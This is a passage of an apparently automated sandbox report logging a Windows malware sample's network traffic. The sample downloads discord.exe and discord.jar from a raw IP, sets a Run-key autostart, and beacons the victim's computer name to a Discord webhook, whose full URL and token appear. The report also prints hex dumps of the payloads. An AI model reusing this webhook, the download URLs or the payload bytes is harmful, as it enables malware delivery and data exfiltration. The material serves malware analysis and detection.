                                                                                    Data Ascii: eAssemblyTitleAttributeAsyncStateMachineAttributeDebuggerStepThroughAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttribu
                                                                                    Feb 3, 2023 20:37:27.818778992 CET110INData Raw: 65 73 00 4d 41 48 41 2e 46 6f 72 6d 31 2e 72 65 73 6f 75 72 63 65 73 00 64 69 73 63 6f 72 64 2e 50 72 6f 70 65 72 74 69 65 73 2e 52 65 73 6f 75 72 63 65 73 2e 72 65 73 6f 75 72 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 64 69 73 63
                                                                                    Data Ascii: esMAHA.Form1.resourcesdiscord.Properties.Resources.resourcesDebuggingModesdiscord.PropertiesSystem.Windows.Forms.VisualStylesEnableVisualStylesGetBytesSettingsEventArgsSystem.Threading.Tasksget_ControlsSystem.Windows.Formsget_Head
                                                                                    Feb 3, 2023 20:37:27.818814993 CET112INData Raw: 00 6f 00 66 00 74 00 5c 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 20 00 45 00 78 00 70 00 6c 00 6f 00 72 00 65 00 72 00 5c 00 00 3f 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 32 00 33 00 2e 00 39 00 34 00 2e 00 39 00 39 00 2e 00 31 00 31
                                                                                    Data Ascii: oft\Internet Explorer\?http://23.94.99.119/discord.exe[SOFTWARE\Microsoft\Windows\CurrentVersion\RunDiscord?http://23.94
                                                                                    Feb 3, 2023 20:37:27.818854094 CET113INData Raw: 69 74 48 75 62 00 00 09 01 00 04 4d 41 48 41 00 00 22 01 00 1d 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 47 69 74 48 75 62 20 32 30 31 33 2d 32 30 31 35 00 00 29 01 00 24 39 37 37 32 65 38 34 64 2d 38 36 30 66 2d 34 66 61 30 2d 62 63 61 65 2d 38 63
                                                                                    Data Ascii: itHubMAHA"Copyright GitHub 2013-2015)$9772e84d-860f-4fa0-bcae-8cad8632350c1.0.0.0I.NETFramework,Version=v4.8TFrameworkDisplayName.NET Framework 4.8MAHA.Program+<Main>d__0A3System.Resources.Tools.S
                                                                                    Feb 3, 2023 20:37:27.818890095 CET114INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Feb 3, 2023 20:37:27.943967104 CET116INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Feb 3, 2023 20:37:27.985382080 CET133OUTGET /discord.jar HTTP/1.1
                                                                                    Host: 23.94.99.119
                                                                                    Feb 3, 2023 20:37:28.107825041 CET135INHTTP/1.1 200 OK
                                                                                    Date: Fri, 03 Feb 2023 19:37:28 GMT
                                                                                    Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
                                                                                    Last-Modified: Thu, 26 Jan 2023 03:05:11 GMT
                                                                                    ETag: "9feb5-5f32204607ff8"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 655029
                                                                                    Content-Type: application/java-archive
                                                                                    Data Raw: 50 4b 03 04 14 00 08 08 08 00 a5 98 39 56 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 49 6c 49 49 6c 4c 6c 6c 49 2f 6c 6c 6c 49 6c 49 6c 49 6c 6c 6c 2f 49 49 6c 6c 6c 6c 6c 49 6c 49 49 6c 2f 6c 49 6c 49 6c 49 49 6c 6c 49 2f 49 49 6c 6c 49 6c 6c 6c 6c 49 49 6c 49 49 49 49 2e 63 6c 61 73 73 d5 3c 07 40 14 47 d7 b3 fb 0e 0e 8e 03 d6 5b 16 59 50 44 44 a4 0a 2a 2e 78 d8 10 44 0f 10 0b ab 02 56 44 04 04 01 01 0b 4a d4 58 63 4c 8f 31 31 cd 96 c4 98 98 c4 44 83 18 13 4b 8a 26 c6 24 a6 1b a3 29 98 de 13 d3 1b ff 9b d9 bd 42 b1 e7 fb f2 fd 78 f7 76 df ec cc 6b f3 de cc bc d9 39 8f fc fd c4 3e 42 48 82 41 e2 c8 40 5b b9 cd 56 9e 55 5e 6e 8b 2b 47 c0 fe 95 97 c7 d9 28 64 b8 ad 3c 4e 2b b6 d1 3a 0c b2 27 b4 c4 66 33 12 8e 23 c2 cc 82 b9 05 71 e5 05 15 c5 71 23 a7 cd 2c 2a ac 35 12 c0 52 5a d5 66 b3 b7 2d b7 71 64 40 d6 45 72 d3 d8 68 64 92 39 e2 63 d3 2a 69 35 90 a0 38 21 cb c9 3b a7 b6 ba b4 a2 98 56 d3 04 b4 e9 64 38 c2 d9 60 72 70 f1 19 fa c4 66 97 9d 92 e0 88 21 22 72 c2 10 8e f8 6a 35 6d ba 6e e5 1c 49 8a 70 a1 9c 5a 5e 50 53 93 9c d5 5a cd 64 5b 64 db 32 8e f4 ee af 5a db 96 0f 6c 43 b0 7f d4 c0 64 55 4d 8e c4 2f 47 42 9c 0f 51 86 a2 e2 82 f2 94 c2 c2 a2 9a 9a a1 f3 0b 8b aa 6a 4b 2b 2b 8c a4 03 47 02 9d b5 c6 cc a9 a8 2d 9d 55 e4 f2 5c 44 7b b0 e7 a5 95 71 b6 91 2e 0f 24 a8 e8 f1 c8 56 98 16 9b 93 66 26 9e c4 e4 49 78 22 43 71 ff 9d 2f 42 f7 93 d3 12 38 32 f8 62 9d c0 66 ef d9 72 ad c8 48 3a d3 0e b7 77 8c 4e 81 23 89 17 62 c5 7c bb 19 e7 d4 96 96 c7 65 95 d6 d4 26 9b 49 17 12 62 22 c1 a4 2b f6 59 cb 67 46 d2 8d 23 1e a5 b5 45 d5 05 b5 95 d5 1c f1 8f 70 6d 6d d3 cb 91 42 77 12 ee 45 c2 48 0f e8 9d 38 61 13 76 71 2b 41 8c 24 8a 23 96 b6 2d 8d 24 86 23 c6 92 82 9a ec a2 f9 b5 1c 81 88 c8 7c 33 e9 49 e2 bc 48 2c 89 87 d0 c4 ad 1d d1 6b 2a d8 33 bf 88 76 fa df 4c fa 90 04 5a b9 2f 47 3a 3a 9f 56 17 cd 28 c7 c7 71 e9 a5 45 e5 d3 8d 24 11 ca b7 de 5d 0b 09 bd 17 e6 62 af 69 76 b6 3b 26 bb e1 48 4f 57 db b5 68 de d2 ef 74 b7 37 93 64 d2 9f 9a 6c 00 e4 97 1d 29 31 13 37 e2 4e 3b 7a 30 94 dc 66 f5 e7 48 f2 65 84 9e 91 a4 a2 b6 7a e0 e9 d1 ac 3d 42 13 46 b4 e8 be 11 05 55 28 ca 50 92 6e 22 69 64 18 47 bc 5b 3c 32 12 6c e1 55 58 59 51 5b 50 5a 51 93 59 54 c7 11 29 a2 ad 0d a9 c9 33 49 96 17 c9 20 23 20 23 7f 11 8e 26 c6 e2 a2 5a b5 ae aa 08 ad d5 c2 ea 9a 53 99 c9 28 32 da 44 92 c8 18 08 7d 3a 0d 87 35 c0 ea 1c 09 6f 8f 76 7b 5d 36 96 8c a3 cc c6 43 67 ef d7 83 39 d2 41 d7 d1 69 03 8e 8c 3e a7 2b b7 ec 9f 0b 1b 29 cc 24 9f 4c 30 61 17 4d 44 79 6b a8 bc 3d da 91 b7 1d 0d c6 99 c9 64 32 85 aa 3b 15 7c 3b 1b c2 21 27 ec a0 0a 83 ae 79 3b 8a 82 5e 14 74 87 84 ed 1e 23 61 92 4f 6e 09 47 dc fb 97 56 94 d6 0e 64 ce 8c 6d 4b c9 4c 13 b1 90 32 c8 b8 a3 ff 2f 2d 46 6f cd 95 8c a4 02 82 0e bf f9 03 84 bf 9e b1 99 82 3d 14 3c 04 b1 5f 98 37 9a 88 3f 36 84 a1 47 b6 40 4c d1 c3 cf 82 e1 ed ef 67 60 27 0f ad ae ae ac 0e 29 ad 08 c1 b8 29 f1 20 ad bb 55 77 51 8d f9 42 13 f1 23 f5 94 50 3d c4 7f 66 d8 0b 11 8f dc fa 2e ce 0d 17 e7 9f e5 e5 fa f4 a2 0d 37 46 72 25 6a a2 47 91 7d 54 b2 99 c9 32 e2 4d 2d bc 1c fd d4
                                                                                    Data Ascii: PK9VDIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIllIllllIIlIIII.class<@G[YPDD*.xDVDJXcL11DK&$)Bxvk9>BHA@[VU^n+G(d<N+:'f3#qq#,*5RZf-qd@Erhd9c*i58!;Vd8`rpf!"rj5mnIpZ^PSZd[d2ZlCdUM/GBQjK++G-U\D{q.$Vf&Ix"Cq/B82bfrH:wN#b|e&Ib"+YgF#EpmmBwEH8avq+A$#-$#|3IH,k*3vLZ/G::V(qE$]biv;&HOWht7dl)17N;z0fHez=BFU(Pn"idG[<2lUXYQ[PZQYT)3I # #&ZS(2D}:5ov{]6Cg9Ai>+)$L0aMDyk=d2;|;!'y;^t#aOnGVdmKL2/-Fo=<_7?6G@Lg`')) UwQB#P=f.7Fr%jG}T2M-


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    5192.168.2.34968723.94.99.11980C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Feb 3, 2023 20:37:45.490513086 CET823OUTGET /discord.exe HTTP/1.1
                                                                                    Host: 23.94.99.119
                                                                                    Connection: Keep-Alive
                                                                                    Feb 3, 2023 20:37:45.622406006 CET825INHTTP/1.1 200 OK
                                                                                    Date: Fri, 03 Feb 2023 19:37:45 GMT
                                                                                    Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
                                                                                    Last-Modified: Mon, 30 Jan 2023 14:08:02 GMT
                                                                                    ETag: "7800-5f37bbe46bd01"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 30720
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-msdownload
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 69 01 d9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6e 00 00 00 08 00 00 00 00 00 00 7e 8c 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2a 8c 00 00 4f 00 00 00 00 a0 00 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 98 8b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 6c 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 a0 00 00 00 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 8c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 29 00 00 d4 1c 00 00 03 00 02 00 13 00 00 06 68 46 00 00 30 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 19 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 02 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 73 1c 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 01 00 0b 00 00 00 03 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 06 00 00 06 28 1e 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a ce 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 11 00 00 06 00 02 7b 08 00 00 04 25 6f 20 00 00 0a 72 3b 00 00 70 28 21 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 0a 00 2a ba 00 72 75 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 8f 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a ba 00 72 ab 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 cb 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 04 00 00 04 14 fe 03 2b 01
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{i"0n~ @ `*O8 H.textl n `.rsrcp@@.relocv@B^H)hF0E&(*09~,"rp(os~+*0~+*"*0~+*"(*Vs(t*}(({%o r;p(!o"***rup(#&{%o ($rp(%o"*rp(#&{%o ($rp(%o"**&(&**0+,{+
                                                                                    Feb 3, 2023 20:37:45.622447014 CET826INData Raw: 16 0a 06 2c 0e 00 02 7b 04 00 00 04 6f 27 00 00 0a 00 00 02 03 28 28 00 00 0a 00 2a 00 13 30 03 00 06 05 00 00 05 00 00 11 00 d0 04 00 00 02 28 1a 00 00 0a 73 29 00 00 0a 0a 02 73 2a 00 00 0a 7d 05 00 00 04 02 73 2b 00 00 0a 7d 06 00 00 04 02 73
                                                                                    Data Ascii: ,{o'((*0(s)s*}s+}s,}s-}s+}s*}s,}s,}(.{Ks/o0{rpo1{ s2o3{o4{o5{
                                                                                    Feb 3, 2023 20:37:45.622462034 CET827INData Raw: 28 43 00 00 0a 00 02 02 fe 06 0e 00 00 06 73 36 00 00 0a 28 44 00 00 0a 00 02 16 28 45 00 00 0a 00 02 28 46 00 00 0a 00 2a 00 00 13 30 02 00 31 00 00 00 06 00 00 11 73 14 00 00 06 0a 06 28 47 00 00 0a 7d 0e 00 00 04 06 15 7d 0d 00 00 04 06 7c 0e
                                                                                    Data Ascii: (Cs6(D(E(F*01s(G}}|(+|(I*0(oJ(K*"(*0{(Lrp(!}(Mr-p(!}sN}(O(P{(Q
                                                                                    Feb 3, 2023 20:37:45.622483969 CET828INData Raw: 00 72 02 4f 09 0e 00 02 06 4f 09 0e 00 7f 01 4f 09 cb 00 b7 06 00 00 0e 00 d6 01 4f 09 12 00 49 06 68 05 db 00 5b 07 00 00 06 00 8c 05 fc 00 0e 00 4e 06 4f 09 06 00 c5 01 fc 00 06 00 ca 01 1b 06 06 00 e1 0a fc 00 06 00 17 07 fc 00 06 00 eb 0a 58
                                                                                    Data Ascii: rOOOOIh[NOXp24prMa4eMM'bfxO-:B{
                                                                                    Feb 3, 2023 20:37:45.622498989 CET830INData Raw: 09 53 01 61 01 06 01 59 01 19 02 f1 06 61 01 59 01 dd 06 67 01 59 01 eb 09 06 00 29 00 93 00 9c 03 2e 00 0b 00 e1 01 2e 00 13 00 ea 01 2e 00 1b 00 09 02 2e 00 23 00 12 02 2e 00 2b 00 12 02 2e 00 33 00 1e 02 2e 00 3b 00 24 02 2e 00 43 00 30 02 2e
                                                                                    Data Ascii: SaYaYgY)....#.+.3.;$.C0.K:.S$.[.c].k.sC{CCIcc{B@@@`4SXj
                                                                                    Feb 3, 2023 20:37:45.622519970 CET831INData Raw: 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 79 6e 63 53 74 61 74 65 4d 61 63 68 69 6e 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 65 72 53 74 65 70 54 68 72 6f 75 67 68 41 74 74 72 69 62 75 74 65 00 41
                                                                                    Data Ascii: eAssemblyTitleAttributeAsyncStateMachineAttributeDebuggerStepThroughAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttribu
                                                                                    Feb 3, 2023 20:37:45.622540951 CET832INData Raw: 65 73 00 4d 41 48 41 2e 46 6f 72 6d 31 2e 72 65 73 6f 75 72 63 65 73 00 64 69 73 63 6f 72 64 2e 50 72 6f 70 65 72 74 69 65 73 2e 52 65 73 6f 75 72 63 65 73 2e 72 65 73 6f 75 72 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 64 69 73 63
                                                                                    Data Ascii: esMAHA.Form1.resourcesdiscord.Properties.Resources.resourcesDebuggingModesdiscord.PropertiesSystem.Windows.Forms.VisualStylesEnableVisualStylesGetBytesSettingsEventArgsSystem.Threading.Tasksget_ControlsSystem.Windows.Formsget_Head
                                                                                    Feb 3, 2023 20:37:45.622565031 CET834INData Raw: 00 6f 00 66 00 74 00 5c 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 20 00 45 00 78 00 70 00 6c 00 6f 00 72 00 65 00 72 00 5c 00 00 3f 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 32 00 33 00 2e 00 39 00 34 00 2e 00 39 00 39 00 2e 00 31 00 31
                                                                                    Data Ascii: oft\Internet Explorer\?http://23.94.99.119/discord.exe[SOFTWARE\Microsoft\Windows\CurrentVersion\RunDiscord?http://23.94
                                                                                    Feb 3, 2023 20:37:45.622590065 CET835INData Raw: 69 74 48 75 62 00 00 09 01 00 04 4d 41 48 41 00 00 22 01 00 1d 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 47 69 74 48 75 62 20 32 30 31 33 2d 32 30 31 35 00 00 29 01 00 24 39 37 37 32 65 38 34 64 2d 38 36 30 66 2d 34 66 61 30 2d 62 63 61 65 2d 38 63
                                                                                    Data Ascii: itHubMAHA"Copyright GitHub 2013-2015)$9772e84d-860f-4fa0-bcae-8cad8632350c1.0.0.0I.NETFramework,Version=v4.8TFrameworkDisplayName.NET Framework 4.8MAHA.Program+<Main>d__0A3System.Resources.Tools.S
                                                                                    Feb 3, 2023 20:37:45.622613907 CET836INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Feb 3, 2023 20:37:45.744457006 CET838INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349685162.159.137.232443C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-03 19:37:31 UTC0OUTPOST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    Host: canary.discord.com
                                                                                    Content-Length: 62
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2023-02-03 19:37:31 UTC0INHTTP/1.1 100 Continue
                                                                                    2023-02-03 19:37:31 UTC0OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 43 6f 6e 6e 65 63 74 65 64 20 46 6f 72 6d 20 41 75 74 6f 53 74 61 72 74 3a 20 20 43 6f 6d 70 75 74 65 72 2d 4e 61 6d 65 3a 39 33 36 39 30 35 22 7d
                                                                                    Data Ascii: {"content": "Connected Form AutoStart: Computer-Name:936905"}
                                                                                    2023-02-03 19:37:31 UTC0INHTTP/1.1 204 No Content
                                                                                    Date: Fri, 03 Feb 2023 19:37:31 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    CF-Ray: 793d9f226a90906d-FRA
                                                                                    Set-Cookie: __dcfduid=3332920ca3fa11ed82b6467b796b8d6b; Expires=Wed, 02-Feb-2028 19:37:31 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Via: 1.1 google
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    X-Content-Type-Options: nosniff
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1675453052
                                                                                    x-ratelimit-reset-after: 1
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uVBzKGQpNb1b35HEONL3ID0%2Bg06WsgC%2FTtbtmbQY%2FYgQWIdonLFYJanEgN6VAwUa46z4GvKHIDhUrFlHsqopKM4%2FsI1o7VAYQjFUHJwTzmMn9d8BWi9kXg2QXGrJVhCm32Jtjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: __sdcfduid=3332920ca3fa11ed82b6467b796b8d6bbe3df59c474caa6ebe7c69b8418d87b4d6dbb1ee333cfb653f3befd650730606; Expires=Wed, 02-Feb-2028 19:37:31 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Set-Cookie: __cfruid=a1b3874e26ce4f3d8484a0daec5fe52b76cbe89e-1675453051; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.349688162.159.137.232443C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-03 19:37:47 UTC1OUTPOST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    Host: canary.discord.com
                                                                                    Content-Length: 62
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2023-02-03 19:37:47 UTC1INHTTP/1.1 100 Continue
                                                                                    2023-02-03 19:37:47 UTC1OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 43 6f 6e 6e 65 63 74 65 64 20 46 6f 72 6d 20 41 75 74 6f 53 74 61 72 74 3a 20 20 43 6f 6d 70 75 74 65 72 2d 4e 61 6d 65 3a 39 33 36 39 30 35 22 7d
                                                                                    Data Ascii: {"content": "Connected Form AutoStart: Computer-Name:936905"}
                                                                                    2023-02-03 19:37:47 UTC1INHTTP/1.1 204 No Content
                                                                                    Date: Fri, 03 Feb 2023 19:37:47 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    CF-Ray: 793d9f884a77372e-FRA
                                                                                    Set-Cookie: __dcfduid=3ce2a8b4a3fa11ed972b9a82994a9fb2; Expires=Wed, 02-Feb-2028 19:37:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Via: 1.1 google
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    X-Content-Type-Options: nosniff
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1675453069
                                                                                    x-ratelimit-reset-after: 1
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kbDKQ4a7%2FgITukl7XL3EktzAxdf7%2BWA%2FQ6%2F9hGt%2BjDm4IwnLb1Qq8RToP0hce36PPAAZWBdxj0VUe8dGiq9VYtXS8Ctv5lhpXv4%2FWN6JZVOhURzJGmdK5OgOy%2B9Xh5fCHmV84A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: __sdcfduid=3ce2a8b4a3fa11ed972b9a82994a9fb26d0eb4d6e2d1d73bf757c93d678dcc9ae697047de03c5f466d61d0ad2ad1e170; Expires=Wed, 02-Feb-2028 19:37:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Set-Cookie: __cfruid=7c8531cccca1024545d123ced1410a355c29c725-1675453067; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.349690162.159.138.232443C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-03 19:37:57 UTC3OUTPOST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    Host: canary.discord.com
                                                                                    Content-Length: 62
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2023-02-03 19:37:57 UTC3INHTTP/1.1 100 Continue
                                                                                    2023-02-03 19:37:57 UTC3OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 43 6f 6e 6e 65 63 74 65 64 20 46 6f 72 6d 20 41 75 74 6f 53 74 61 72 74 3a 20 20 43 6f 6d 70 75 74 65 72 2d 4e 61 6d 65 3a 39 33 36 39 30 35 22 7d
                                                                                    Data Ascii: {"content": "Connected Form AutoStart: Computer-Name:936905"}
                                                                                    2023-02-03 19:37:57 UTC3INHTTP/1.1 204 No Content
                                                                                    Date: Fri, 03 Feb 2023 19:37:57 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    CF-Ray: 793d9fc58e81371a-FRA
                                                                                    Set-Cookie: __dcfduid=42c24d3ea3fa11edbdfe6a4fbaaa6198; Expires=Wed, 02-Feb-2028 19:37:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Via: 1.1 google
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    X-Content-Type-Options: nosniff
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1675453078
                                                                                    x-ratelimit-reset-after: 1
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TpeGyR%2BVdalNJR1iO%2FfDp7eGUTxoXkk75Jbc2KVgopZl3hFgAxwkcuEbPRJ6gyiYKJBrKGf3IuRHvEsnfZ09CbT7uXF091KWFDHB1ejN2RIHSj9KL%2FeQWu8ueIWfqAAiWBV8lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
